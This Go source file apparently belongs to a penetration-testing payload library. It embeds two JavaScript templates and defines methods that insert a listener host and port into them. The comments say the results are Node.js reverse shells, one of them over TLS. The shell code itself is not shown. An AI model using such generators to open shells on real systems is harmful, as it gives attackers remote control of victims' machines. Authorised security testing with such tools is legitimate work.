package reverse

import (
	_ "embed"
	"fmt"
)

var (

	//go:embed nodejs/reverse.js
	NodeJS string
	//go:embed nodejs/reverse_tls.js
	SecureNodeJS string
)

// NodeJS generates a Node compatible reverse shell with OS detection for Windows. It is not minified and utilizes double quotes.
func (js *JavascriptPayload) NodeJS(lhost string, lport int) string {
	return fmt.Sprintf(NodeJS, lport, lhost)
}

// SecureNodeJS generates a Node compatible reverse shell with TLS support with OS detection for Windows. It is not minified and utilizes double quotes.
func (js *JavascriptPayload) SecureNodeJS(lhost string, lport int) string {
	return fmt.Sprintf(SecureNodeJS, lport, lhost)
}
